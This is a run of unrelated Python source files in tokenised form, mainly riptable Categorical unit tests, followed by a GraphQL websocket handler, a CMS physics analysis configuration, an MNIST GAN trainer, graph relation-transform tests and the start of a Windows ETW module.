assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep># The underlying FastArray should have the items shifted to the i-th position.
<if_stmt>i<g>0# shift forwards case
<block_start>assert_array_equal(shift_cat._fa[i:] categorical._fa[:-i] f"FastArray items should be shifted by {i} positions." )<line_sep># The Categorical should have the values shifted to the i-th position.
cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values[i:] cat_values[:-i] f"Categorical values should be shifted by {i} positions." )<line_sep># The underlying FastArray should have the first i-items to be the invalid value.
# The Categorical values should have the first i-items be the filtered or invalid name.
# Need to handle other invalid values and other Categorical base indexing.
assert_array_equal(shift_cat_values[:i] np.full(i filtered_name) f"Shifted Categorical values up to {i}-th position should be '{filtered_name}'." )<line_sep>assert_array_equal(shift_cat._fa[:i] np.zeros(i) f"Shifted Categorical underlying FastArray items up to {i}-th position should be the invalid value 0." )<block_end><elif_stmt>i<l>0# shifted backwards case
<block_start>i=abs(i)# slicing arithmetic based on positional value of i
assert_array_equal(shift_cat._fa[:cat_len-i] categorical._fa[i:] f"FastArray items should be shifted by -{i} positions." )<line_sep>cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values[:cat_len-i] cat_values[i:] f"Categorical values should be shifted by -{i} positions." )<line_sep>assert_array_equal(shift_cat_values[-i:] np.full(i filtered_name) f"Shifted Categorical values up to -{i}-th position should be '{filtered_name}'." )<line_sep>assert_array_equal(shift_cat._fa[-i:] np.zeros(i) f"Shifted Categorical underlying FastArray items up to -{i}-th position should be the invalid value 0." )<block_end><elif_stmt>i<eq>0# zero-th shift case
# test for equality
<block_start>assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep>assert_array_equal(shift_cat._fa categorical._fa)<line_sep>cat_values,shift_cat_values=(categorical.expand_array shift_cat.expand_array )<line_sep>assert_array_equal(shift_cat_values cat_values)<block_end><block_end># shift overflow for backward and forward case up to two values
<for_stmt>i list(range(-cat_len-2 -cat_len))+list(range(cat_len cat_len+2))<block_start>shift_cat=categorical.shift_cat(i)<line_sep>assert_array_equal(shift_cat.category_array categorical.category_array)<line_sep># Investigate possible bug with expanding Categorical values. E.g.:
# given:
# Categorical([a, a, a, a, a, a, a, a, a, a]) Length: 10
# FastArray([1, 1, 1, 1, 1, 1, 1, 1, 1, 1], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# shifted categorical
# Categorical([Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered, Filtered]) Length: 10
# FastArray([0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=int8) Base Index: 1
# FastArray([b'a'], dtype='|S1') Unique count: 1
# got
# E x: FastArray([b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'a'], dtype='|S8')
# E y: array([b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered',
# E b'Filtered', b'Filtered', b'Filtered', b'Filtered', b'Filtered'],
# E dtype='|S8')
# Expected all values to be b'Filtered', but saw b'a'.
# todo assert_array_equal(shift_cat_values, np.full(cat_len, filtered_name), f"Overflow shifted Categorical values. All values are expected to be invalid '{filtered_name}'.")
assert_array_equal(shift_cat._fa np.zeros(cat_len) f"Overflow shifted Categorical underlying FastArray items. All values are expected to be invalid value 0." )<block_end><block_end><block_end>@pytest.mark.parametrize(# TODO - add base 0 and base 1 indexing w/ expectations
"categoricals" [# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_np_array_values" ) # Categorical constructed from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray])] id="cat_with_rt_fastarray_values" ) ] )@pytest.mark.parametrize("misc" [<none> "INVALID"])# TODO - add numeric values
@pytest.mark.parametrize("inplace" [<false> <true>])<def_stmt>test_shrink categoricals misc inplace<block_start><for_stmt>categorical categoricals<block_start>cat=categorical.copy(deep=<true>)# deep copy so test data remains unchanged with inplace shrinks
# Test 1 Shrink with empty values.
# Shrink to empty categories.
shrink_cat=cat.shrink([] misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<if_stmt>misc<is><none># For base index 1 Categorical, the underlying FastArray should be all zeros.
<block_start>assert_array_equal(shrink_cat._fa np.zeros(len(cat)))<line_sep># The Categorical categories should be empty.
expected_category_array=np.empty(0)<line_sep>assert_array_equal(shrink_cat.category_array expected_category_array f"Category array should be empty." )<for_stmt>arr shrink_cat.category_dict.values()<block_start>assert_array_equal(arr expected_category_array f"Category dictionary values should be empty." )<block_end># TODO expanding shrink categorical does not return the original type's invalid value; instead it returns nans
# N.B, when shrinking, the category array type changes to float64
# E x: FastArray([nan])
# E y: array([b'Filtered'], dtype='|S8')
# assert_array_equal(shrink_cat.expand_array, np.full(len(cat), filtered_name), f"Given empty values, shrink categorical values should all be invalid '{filtered_name}'.")
<block_end><else_stmt># single categories being the specified misc
# TODO - consider any constraints to assert on for the dtype?
# The invalid value based on the dtype: e.g., for U32 its -2147483646
# assert_array_equal(shrink_cat._fa, InvalidValuesForDtype)
# assert_array_equal(shrink_cat.expand_array, InvalidValuesForDtypeExpanded)
# The categories should only contain the misc value.
<block_start>expected_category_array=np.array(misc)<line_sep>assert_array_equal(shrink_cat.category_array expected_category_array f"Category array should only contain the '{misc}' category." )<for_stmt>arr shrink_cat.category_dict.values()<block_start>assert_array_equal(arr expected_category_array f"Category dictionary values should only contain the '{misc}' category." )<block_end><block_end># Test 2 Shrink with same categories
cat=categorical.copy(deep=<true>)<line_sep># Shrink to all the same categories.
shrink_cat=cat.shrink(cat.category_array misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<if_stmt>misc<is><none># TODO handle the misc not None case
<block_start>shrink_cat_values,cat_values=shrink_cat.expand_array cat.expand_array<line_sep>assert_array_equal(shrink_cat_values cat_values)<line_sep>assert_array_equal(shrink_cat._fa cat._fa)<line_sep>assert_array_equal(shrink_cat.category_array cat.category_array)<for_stmt>arr,expected_arr zip(shrink_cat.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(arr expected_arr)<block_end><block_end># TODO Test 3 Shrink with subset of categories
cat=categorical.copy(deep=<true>)<line_sep># Shrink to all the same categories.
n=int(len(cat)/2)<line_sep>shrink_cat=cat.shrink(cat.category_array[:n] misc=misc inplace=inplace)<line_sep># Type is preserved after shrinking.
<assert_stmt>isinstance(shrink_cat Categorical) "shrink_cat should be a Categorical."<block_end><block_end>@pytest.mark.parametrize("categoricals" [# TODO - test categorical construction using numpy and riptable arrays as a separate test
# Categorical constructed from python list data
pytest.param([Categorical(data)<for>data get_categorical_data_factory_method()] id="cat_with_list_values" ) # Categorical constructed from numpy array
pytest.param([Categorical(np.array(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_np_array_values" ) # Categorical constructed from riptable fast array
pytest.param([Categorical(rt.FastArray(data))<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])] id="cat_with_rt_fastarray_values" ) ] )<def_stmt>test_sds categoricals tmpdir<block_start>dir=tmpdir.mkdir("test_categorical_sds")<for_stmt>i,cat enumerate(categoricals)<block_start>name="categorical_"+str(i)<line_sep>p=str(dir.join(name))<line_sep>save_sds(p cat)<line_sep>cat2=load_sds(p)<line_sep># Test 1 Saved and loaded categoricals should be the same.
# TODO vary the meta version optional parameter when calling Categorical._load_from_sds_meta_data
<assert_stmt>isinstance(cat2 Categorical)<line_sep>assert_array_equal(cat2._fa cat._fa)<if_stmt><not>cat.ismultikey# MultiKey Categorical's do not support category_array operation
<block_start>assert_array_equal(cat2.category_array cat.category_array)<block_end><for_stmt>actual,expected zip(cat2.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(actual expected)<block_end>cat2_values,cat_values=cat2.expand_array cat.expand_array<line_sep>assert_array_equal(cat2_values cat_values)<line_sep># Test 2 As and from meta data Categoricals should be the same.
cat3=Categorical._from_meta_data(*cat._as_meta_data(name=name))<line_sep># Saved and loaded categoricals should be the same.
<assert_stmt>isinstance(cat3 Categorical)<line_sep>assert_array_equal(cat3._fa cat._fa)<if_stmt><not>cat.ismultikey# MultiKey Categorical's do not support category_array operation
<block_start>assert_array_equal(cat3.category_array cat.category_array)<block_end><for_stmt>actual,expected zip(cat3.category_dict.values() cat.category_dict.values())<block_start>assert_array_equal(actual expected)<block_end>cat3_values,cat_values=cat3.expand_array cat.expand_array<line_sep>assert_array_equal(cat3_values cat_values)<block_end><block_end>@pytest.mark.parametrize("categoricals" [# TODO handle CategoryMode IntEnum and Default
[Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]+[Categorical(data base_index=0)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]] )<def_stmt>test_from_bin categoricals<block_start><for_stmt>cat categoricals<block_start>cat_arr_len=len(cat.category_array)<line_sep># Test 1 All bin values are in the category array.
<if_stmt>cat.base_index<eq>0<block_start><for_stmt>i range(cat_arr_len)<block_start><assert_stmt>cat.from_bin(i)<in>cat.category_array<block_end><block_end><elif_stmt>cat.base_index<eq>1<block_start><for_stmt>i range(1 cat_arr_len+1)<block_start><assert_stmt>cat.from_bin(i)<in>cat.category_array<block_end><block_end><else_stmt><block_start><raise>ValueError(f"Unhandled Categorical base index {cat.base_index}")<block_end># Test 2 Handling of invalid input types: base_index and bin.
# The bin is not an integer.
<with_stmt>pytest.raises(TypeError)<block_start>cat.from_bin(str(i))<line_sep>cat.from_bin(float(i))<block_end># Bin value out of range.
<with_stmt>pytest.raises(ValueError)<block_start>cat.from_bin(-1)<if_stmt>cat.base_index<eq>0<block_start>cat.from_bin(cat_arr_len)<block_end><elif_stmt>cat.base_index<eq>1<block_start>cat.from_bin(0)<line_sep>cat.from_bin(cat_arr_len+1)<block_end><else_stmt><block_start><raise>ValueError(f"Unhandled Categorical base index {cat.base_index}")<block_end><block_end># The base index is None.
cat.grouping._base_index=<none><with_stmt>pytest.raises(TypeError)<block_start>cat.from_bin(1)<block_end><block_end><block_end>@pytest.mark.parametrize("cat" get_all_categorical_data())<def_stmt>test_argsort cat<block_start>assert_array_equal(cat.argsort() np.argsort(cat._fa) "Categorical argsort should be equivalent to the argsort of the underlying FastArray" )<block_end>@pytest.mark.parametrize("cats" [pytest.param([Categorical(data)<for>data get_categorical_data_factory_method([CategoryMode.StringArray CategoryMode.NumericArray])]) pytest.param([Categorical(data)<for>data get_categorical_data_factory_method(CategoryMode.MultiKey)] marks=[pytest.mark.xfail(reason="NotImplementedError: Add categories not supported for MultiKey Categoricals")] ) ] )# TODO parameterize across base index 0 and 1
<def_stmt>test_auto_add cats<block_start><for_stmt>cat cats<block_start>alpha,beta="alpha" "beta"<line_sep>first_index,last_index=0 len(cat)-1<line_sep># Test 1 auto_add_on will allow addition of a category if the Categorical is unlocked,
# otherwise an error is raised.
cat.auto_add_on()<line_sep>cat.unlock()# Categorical is unlocked
# Test 1.1 When unlocked and attempting to add a category, the categories should be added.
# set the first and last categories
cat[first_index]=cat[last_index]=alpha<line_sep># auto_add_on and unlock should not allow setting beyond the first and last index of categories
<with_stmt>pytest.raises(IndexError)# index out of bounds
<block_start>cat[first_index-1]=alpha<line_sep>cat[last_index+1]=alpha<block_end># category is added at specified index
first_category=cat.category_array[cat._fa[first_index]-1]<line_sep># TODO normalize the category_array value (which is sometimes a numpy str_ or bytes_) to ascii and compare
# assert cat.category_array[cat._fa[first_index]-1] == alpha
# assert at.category_array[cat._fa[last_index]-1] == alpha
# added category is in category array and dictionary
<assert_stmt>alpha<in>cat.category_array<for_stmt>categories cat.category_dict.values()<block_start><assert_stmt>alpha<in>categories<block_end># Test 1.2 When locked and attempting to add a category, an error is raised and the categories should not be added.
cat.lock()# Categorical is locked
<with_stmt>pytest.raises(IndexError)# cannot add a category since index is locked
<block_start>cat[first_index]=beta<block_end><assert_stmt>beta<not><in>cat.category_array<for_stmt>categories cat.category_dict.values()<block_start><assert_stmt>beta<not><in>categories<block_end># Test 2 auto_add_off will prevent category assignment of non-existing categories and raise an error
cat.auto_add_off()<line_sep># Test 2.1 Unlocked case
cat.unlock()# Categorical is unlocked
<with_stmt>pytest.raises(ValueError)# cannot automatically add categories while auto_add_categories is False
<block_start>cat[first_index]=beta<block_end># Test 2.2 Locked case
cat.lock()<with_stmt>pytest.raises(IndexError)# cannot add a category since index is locked
<block_start>cat[first_index]=beta<block_end><block_end><block_end>@pytest.mark.xfail(reason="rt_numpy.unique() needs to handles multikey categoricals")<def_stmt>test_multikey_categorical_unique <block_start>c=Categorical([arange(3) FA(list('abc'))])<assert_stmt>len(c.unique())<eq>c.nunique()<block_end>@pytest.mark.parametrize("values" [list_bytes list_unicode list_true_unicode])<def_stmt>test_categorical_convert values<block_start>categories=list(set(values))<line_sep># pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c=pd.Categorical(values categories=categories[:-1])<line_sep># The output of categorical_convert, when applied to a pandas Categorical, can be used to
# construct a riptable Categorical. We test that this handles missing categories correctly.
rt_values,rt_categories=rt.categorical_convert(pd_c)<line_sep>cat=rt.Categorical(rt_values categories=rt_categories)<line_sep># The invalid category should not be in the Categorical.
missing_category=categories[-1]<assert_stmt>missing_category<not><in>cat<assert_stmt>missing_category<not><in>cat._categories<assert_stmt>missing_category<not><in>cat.category_array<assert_stmt>missing_category<not><in>cat.category_dict[next(iter(cat.category_dict))]# values of first key
# All other category values should be in the Categorical.
<for_stmt>e categories[:-1]# assert e in cat # uncomment when test_categorical_convert_xfail is fixed
<block_start><assert_stmt>e<in>cat._categories<assert_stmt>e<in>cat.category_array<assert_stmt>e<in>cat.category_dict[next(iter(cat.category_dict))]<block_end><block_end># values of first key
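# Illustrative sketch of the round trip exercised above (hypothetical literals, kept as a
# comment so the test module is unchanged):
# pd_c = pd.Categorical([b'a', b'b', b'c'], categories=[b'a', b'b'])  # b'c' has no category -> pandas code -1
# values, cats = rt.categorical_convert(pd_c)
# rt.Categorical(values, categories=cats)  # rows that held b'c' land in the invalid/filtered bin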
@pytest.mark.xfail(reason="RIP-396 - category not in Categorical, but is in Categorical.category_array")@pytest.mark.parametrize("values" [list_bytes ])<def_stmt>test_categorical_convert_xfail values<block_start>categories=list(set(values))<line_sep># pd_c is a pandas Categorical with a missing category.
# pandas Categorical will designate the values with a missing category by -1.
pd_c=pd.Categorical(values categories=categories[:-1])<line_sep>rt_values,rt_categories=rt.categorical_convert(pd_c)<line_sep>cat=rt.Categorical(rt_values categories=rt_categories)<line_sep># All other category values should be in the Categorical.
<for_stmt>e categories[:-1]<block_start><assert_stmt>e<in>cat<block_end><block_end><def_stmt>test_build_dicts_enum <block_start>str_to_int,int_to_str=Categories.build_dicts_enum(LikertDecision)<line_sep>codes=list(str_to_int.values())<times>2<line_sep>c=Categorical(codes categories=LikertDecision)<line_sep>c2=Categorical(codes categories=str_to_int)<line_sep>c3=Categorical(codes categories=int_to_str)<line_sep># c is our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_enum
# should construct the same Categorical as c.
assert_array_equal(c c2)<line_sep>assert_array_equal(c c3)<block_end>@pytest.mark.parametrize("values" [list("abcdef") [b"a" b"b" b"c" b"d" b"e" b"f"]])<def_stmt>test_build_dicts_python values# int
<block_start>d={k:v<for>k,v enumerate(values)}<line_sep>str_to_int,int_to_str=Categories.build_dicts_python(d)<line_sep>codes=list(d.keys())<times>2<line_sep>c=Categorical(codes categories=d)<line_sep>c2=Categorical(codes categories=str_to_int)<line_sep>c3=Categorical(codes categories=int_to_str)<line_sep># c is our oracle Categorical.
# Categoricals constructed from any of the dictionaries built by build_dicts_python
# should construct the same Categorical as c.
assert_array_equal(c c2)<line_sep>assert_array_equal(c c3)<block_end>@pytest.mark.parametrize("a,b,a_in_b,b_in_a" [pytest.param(Cat(list('abc')) Cat(list('a')) FA([<true> <false> <false>]) FA([<true>]) id='single_key_overlap') pytest.param(Cat([FA(list('abc')) FA([1 2 3])]) Cat([FA(list('a')) FA([1])]) FA([<true> <false> <false>]) FA([<true>]) id='single_multikey_overlap') pytest.param(Cat([FA(list('abc')) FA([1 2 3])]) Cat([FA(list('ab')) FA([1 2])]) FA([<true> <true> <false>]) FA([<true> <true>]) id='two_multikey_overlap') pytest.param(Cat([FA(list('abcde')) FA([1 2 3 4 5])]) Cat([FA(list('dc')) FA([4 5])]) FA([<false> <false> <false> <true> <false>]) FA([<true> <false>]) id='single_multikey_overlap2') pytest.param(Cat([FA(list('abcde')) FA([1 2 3 4 5])]) Cat([FA(list('aba')) FA([1 2 1])]) FA([<true> <true> <false> <false> <false>]) FA([<true> <true> <true>]) id='repeated_key_multikey_overlap') pytest.param(Cat([FA(list('abcdeab')) FA([1 2 3 4 5 1 6])]) Cat([FA(list('aba')) FA([1 2 1])]) FA([<true> <true> <false> <false> <false> <true> <false>]) FA([<true> <true> <true>]) id='repeated_key_multikey_overlap2') ])<def_stmt>test_multikey_categorical_isin a b a_in_b b_in_a<block_start>assert_array_equal(a_in_b a.isin(b))<line_sep>assert_array_equal(b_in_a b.isin(a))<line_sep># TODO this is a good candidate for a hypothesis test once the CategoricalStrategy is able to generate MultiKey Categoricals
f_msg='expected to be consistent with cat1.as_singlekey().isin(cat2.as_singlekey()) operation.'<line_sep>assert_array_equal(a.as_singlekey().isin(b.as_singlekey()) a.isin(b) f_msg)<line_sep>assert_array_equal(b.as_singlekey().isin(a.as_singlekey()) b.isin(a) f_msg)<block_end>_make_unique_test_cases=pytest.mark.parametrize('cat, expected' [(rt.Cat([1 1 2 2] ['a' 'a']) rt.Cat([1 1 1 1] ['a'])) (rt.Cat([2 2 2 2] ['a' 'a']) rt.Cat([1 1 1 1] ['a'])) (rt.Cat([1 2 3 3] ['a' 'a' 'b']) rt.Cat([1 1 2 2] ['a' 'b'])) (rt.Cat([0 0 1 1] ['a' 'a'] base_index=0) rt.Cat([0 0 0 0] ['a'] base_index=0)) (rt.Cat([1 1 1 1] ['a' 'a'] base_index=0) rt.Cat([0 0 0 0] ['a'] base_index=0)) (rt.Cat([0 0 1 1] ['a' 'b'] base_index=0) rt.Cat([0 0 1 1] ['a' 'b'] base_index=0)) (rt.Cat([1 1 2 2 3] [99 99 101] ) rt.Cat([1 1 1 1 2] [99 101])) (rt.Cat([0 0 1 1] [99 99] base_index=0) rt.Cat([0 0 0 0] [99] base_index=0)) (rt.Cat([0 0 1 1] [99 101] base_index=0) rt.Cat([0 0 1 1] [99 101] base_index=0)) (rt.Cat([0 0 1 1 2 2] ['a' 'a'] ) rt.Cat([0 0 1 1 1 1] ['a'] )) (rt.Cat([0 0 1 1 2 2 3 3] ['a' 'a' 'b'] ) rt.Cat([0 0 1 1 1 1 2 2] ['a' 'b'] )) ])<line_sep>@_make_unique_test_cases<def_stmt>test_category_make_unique_not_inplace cat expected<block_start>res=cat.category_make_unique()<assert_stmt>(res<eq>expected).all()<block_end>@pytest.mark.parametrize('base_index' [0 1])<def_stmt>test_category_make_unique_multikey base_index<block_start>c1=Categorical(np.arange(10)%2 ['a' 'a'] base_index=base_index)<line_sep>c2=Categorical(np.arange(10)%3 ['a' 'b' 'c'] base_index=base_index)<line_sep>cat=Categorical([c1 c2] base_index=base_index)<line_sep>res=cat.category_make_unique()<assert_stmt>list(cat)<eq>list(res)<block_end>
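# For reference, the third parametrised case above in plain form (a comment-only sketch):
# rt.Cat([1, 2, 3, 3], ['a', 'a', 'b']).category_make_unique()
# # -> codes [1, 1, 2, 2] over the de-duplicated categories ['a', 'b']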
|
<import_from_stmt>typing Any<import_from_stmt>strawberry.asgi.handlers GraphQLWSHandler<as>BaseGraphQLWSHandler<class_stmt>GraphQLWSHandler(BaseGraphQLWSHandler)<block_start><async_keyword><def_stmt>get_context self<arrow>Any<block_start><return><await>self._get_context()<block_end><async_keyword><def_stmt>get_root_value self<arrow>Any<block_start><return><await>self._get_root_value()<block_end><block_end>
|
## import skeleton process
<import_from_stmt>PhysicsTools.PatAlgos.patTemplate_cfg *<line_sep>#process.Tracer = cms.Service("Tracer")
# load the PAT config
process.load("PhysicsTools.PatAlgos.producersLayer1.patCandidates_cff")<line_sep>patAlgosToolsTask.add(process.patCandidatesTask)<line_sep>#Temporary customize to the unit tests that fail due to old input samples
process.patTaus.skipMissingTauID=<true><line_sep>process.load("PhysicsTools.PatAlgos.selectionLayer1.selectedPatCandidates_cff")<line_sep>patAlgosToolsTask.add(process.selectedPatCandidatesTask)<line_sep>## add inFlightMuons
process.load("SimGeneral.HepPDTESSource.pythiapdt_cfi")<line_sep>process.inFlightMuons=cms.EDProducer("PATGenCandsFromSimTracksProducer" src=cms.InputTag("g4SimHits") ## use "fastSimProducer" for FastSim
setStatus=cms.int32(-1) particleTypes=cms.vstring("mu+") ## picks also mu-, of course
filter=cms.vstring("pt > 0.5") ## just for testing
makeMotherLink=cms.bool(<true>) writeAncestors=cms.bool(<true>) ## save also the intermediate GEANT ancestors of the muons
genParticles=cms.InputTag("genParticles") )<line_sep>patAlgosToolsTask.add(process.inFlightMuons)<line_sep>process.out.outputCommands.append('keep *_inFlightMuons_*_*')<line_sep>## prepare several clones of match associations for status 1, 3 and in flight muons (status -1)
process.muMatch3=process.muonMatch.clone(mcStatus=cms.vint32(3))<line_sep>patAlgosToolsTask.add(process.muMatch3)<line_sep>process.muMatch1=process.muonMatch.clone(mcStatus=cms.vint32(1))<line_sep>patAlgosToolsTask.add(process.muMatch1)<line_sep>process.muMatchF=process.muonMatch.clone(mcStatus=cms.vint32(-1) matched=cms.InputTag("inFlightMuons"))<line_sep>patAlgosToolsTask.add(process.muMatchF)<line_sep>process.patMuons.genParticleMatch=cms.VInputTag(cms.InputTag("muMatch3") cms.InputTag("muMatch1") cms.InputTag("muMatchF") )<line_sep>## dump event content
process.content=cms.EDAnalyzer("EventContentAnalyzer")<line_sep>## ------------------------------------------------------
# In addition you usually want to change the following
# parameters:
## ------------------------------------------------------
#
# process.GlobalTag.globaltag = ... ## (according to https://twiki.cern.ch/twiki/bin/view/CMS/SWGuideFrontierConditions)
# ##
## switch to RECO input
<import_from_stmt>PhysicsTools.PatAlgos.patInputFiles_cff filesRelValTTbarGENSIMRECO<line_sep>process.source.fileNames=filesRelValTTbarGENSIMRECO<line_sep># ##
process.maxEvents.input=10<line_sep># ##
# process.out.outputCommands = [ ... ] ## (e.g. taken from PhysicsTools/PatAlgos/python/patEventContent_cff.py)
# ##
process.out.fileName='patTuple_addDecayInFlight.root'<line_sep># ##
# process.options.wantSummary = False ## (to suppress the long output at the end of the job)
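## A typical way to run this configuration locally (the file name is an assumption):
## cmsRun patTuple_addDecayInFlight_cfg.py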
|
<import_from_stmt>torch.autograd Variable<import_from_stmt>net_gan_mnist *<import_stmt>torch<import_stmt>torch.nn<as>nn<import_stmt>numpy<as>np<import_from_stmt>init *<class_stmt>MNISTGanTrainer(object)<block_start><def_stmt>__init__ self batch_size=64 latent_dims=100<block_start>super(MNISTGanTrainer self).__init__()<line_sep>self.dis=Dis28x28()<line_sep>self.gen=Gen28x28(latent_dims)<line_sep>self.dis_opt=torch.optim.Adam(self.dis.parameters() lr=0.0002 betas=(0.5 0.999) weight_decay=0.0005)<line_sep>self.gen_opt=torch.optim.Adam(self.gen.parameters() lr=0.0002 betas=(0.5 0.999) weight_decay=0.0005)<line_sep>self.true_labels=Variable(torch.LongTensor(np.ones(batch_size dtype=np.int)))<line_sep>self.fake_labels=Variable(torch.LongTensor(np.zeros(batch_size dtype=np.int)))<line_sep>self.dis.apply(xavier_weights_init)<line_sep>self.gen.apply(xavier_weights_init)<block_end><def_stmt>cuda self<block_start>self.dis.cuda()<line_sep>self.gen.cuda()<line_sep>self.true_labels=self.true_labels.cuda()<line_sep>self.fake_labels=self.fake_labels.cuda()<block_end><def_stmt>dis_update self images noise<block_start>self.dis.zero_grad()<line_sep>true_outputs=self.dis(images)<line_sep>true_loss=nn.functional.cross_entropy(true_outputs self.true_labels)<line_sep>_,true_predicts=torch.max(true_outputs.data 1)<line_sep>true_acc=(true_predicts<eq>1).sum()/(1.0<times>true_predicts.size(0))<line_sep>fake_images=self.gen(noise)<line_sep>fake_outputs=self.dis(fake_images)<line_sep>fake_loss=nn.functional.cross_entropy(fake_outputs self.fake_labels)<line_sep>_,fake_predicts=torch.max(fake_outputs.data 1)<line_sep>fake_acc=(fake_predicts<eq>0).sum()/(1.0<times>fake_predicts.size(0))<line_sep>d_loss=true_loss+fake_loss<line_sep>d_loss.backward()<line_sep>self.dis_opt.step()<line_sep><return>0.5<times>(true_acc+fake_acc)<block_end><def_stmt>gen_update self noise<block_start>self.gen.zero_grad()<line_sep>fake_images=self.gen(noise)<line_sep>fake_outputs=self.dis(fake_images)<line_sep>fake_loss=nn.functional.cross_entropy(fake_outputs self.true_labels)<line_sep>fake_loss.backward()<line_sep>self.gen_opt.step()<line_sep><return>fake_images<block_end><block_end>
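# Hedged usage sketch (kept as a comment; the data loader and loop are assumptions, not part
# of this module): one alternating discriminator/generator update per batch.
# trainer = MNISTGanTrainer(batch_size=64, latent_dims=100)
# trainer.cuda()
# for images, _ in mnist_loader:  # hypothetical DataLoader yielding 64x1x28x28 MNIST batches
#     noise = Variable(torch.randn(64, 100)).cuda()
#     acc = trainer.dis_update(images.cuda(), noise)  # discriminator step, returns mean real/fake accuracy
#     fakes = trainer.gen_update(noise)               # generator step, returns the generated images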
|
# Copyright 2020 JD.com, Inc. Galileo Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
<import_stmt>os<import_stmt>pytest<import_stmt>torch<import_stmt>galileo.pytorch<as>gp<import_stmt>tensorflow<as>tf<import_stmt>galileo.tf<as>gt<import_from_stmt>galileo.tests.utils numpy_equal<line_sep>os.environ['CUDA_VISIBLE_DEVICES']='-1'<line_sep># batch size=5 num nodes=10
# indices [5, 9]
fanouts=[2 3]<line_sep>indices=[[2 7 4 4 2 1 3 8 1] [8 9 2 3 6 4 4 4 0] [4 7 1 0 1 3 0 4 1] [4 2 6 1 5 1 4 0 5] [3 2 2 9 8 8 0 1 7] ]<line_sep>expect_no_sort=[[2 8 4 4 3 2 8 4 4 3 7 9 7 2 2 7 9 7 2 2 7 9 7 2 2 4 2 1 6 2 4 2 1 6 2 4 2 1 6 2] [7 9 7 2 2 4 2 1 6 2 4 3 0 1 9 2 6 1 5 8 1 4 3 1 8 3 4 0 4 0 8 4 4 0 1 1 0 1 5 7] ]<line_sep>expect_sort=[[1 1 1 2 2 2 2 2 2 2 2 2 2 2 2 2 2 3 3 4 4 4 4 4 4 4 6 6 6 7 7 7 7 7 7 8 8 9 9 9] [0 4 1 7 4 1 9 5 8 1 8 4 0 4 1 0 7 2 2 7 2 1 6 3 8 1 4 0 5 4 0 2 1 1 3 9 2 3 6 4] ]<line_sep>expect_target=[2 8 4 4 3]<line_sep>@pytest.mark.parametrize('sort_indices' (<false> <true>))<def_stmt>test_relation_transform_tf sort_indices<block_start>rt=gt.RelationTransform(fanouts sort_indices=sort_indices sort_stable=<true>)<line_sep>res=rt.transform(dict(indices=tf.convert_to_tensor(indices) edge_weight=tf.random.normal((5 9))))<assert_stmt>list(res.keys())<eq>['relation_indices' 'relation_weight' 'target_indices' ]<assert_stmt>res['relation_indices'].shape<eq>[2 40]<line_sep>expect=expect_sort<if>sort_indices<else>expect_no_sort<assert_stmt>numpy_equal(res['relation_indices'].numpy() expect)<assert_stmt>res['relation_weight'].shape<eq>[40 1]<assert_stmt>res['target_indices'].shape<eq>[5]<assert_stmt>numpy_equal(res['target_indices'].numpy() expect_target)<block_end>@pytest.mark.parametrize('sort_indices' (<false> <true>))<def_stmt>test_relation_transform_pytorch sort_indices<block_start>rt=gp.RelationTransform(fanouts sort_indices=sort_indices sort_stable=<true>)<line_sep>res=rt.transform(dict(indices=torch.tensor(indices) edge_weight=torch.randn(5 9)))<assert_stmt>list(res.keys())<eq>['relation_indices' 'relation_weight' 'target_indices' ]<assert_stmt>numpy_equal(res['relation_indices'].shape [2 40])<if_stmt>sort_indices# sort is not stable in pytorch
<block_start><assert_stmt>numpy_equal(res['relation_indices'][0].numpy() expect_sort[0])<block_end><else_stmt><block_start><assert_stmt>numpy_equal(res['relation_indices'].numpy() expect_no_sort)<block_end><assert_stmt>numpy_equal(res['relation_weight'].shape [40 1])<assert_stmt>numpy_equal(res['target_indices'].shape [5])<assert_stmt>numpy_equal(res['target_indices'].numpy() expect_target)<block_end>
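# Consistency note for the expected shapes above: with 5 target nodes and fanouts [2, 3] the
# transform presumably emits 5 * 2 = 10 first-hop pairs plus 5 * 2 * 3 = 30 second-hop pairs,
# i.e. 40 relation pairs, matching the asserted relation_indices shape [2, 40] and
# relation_weight shape [40, 1].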
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Wininit
GUID : 206f6dea-d3c5-4d10-bc72-989f03c8b84b
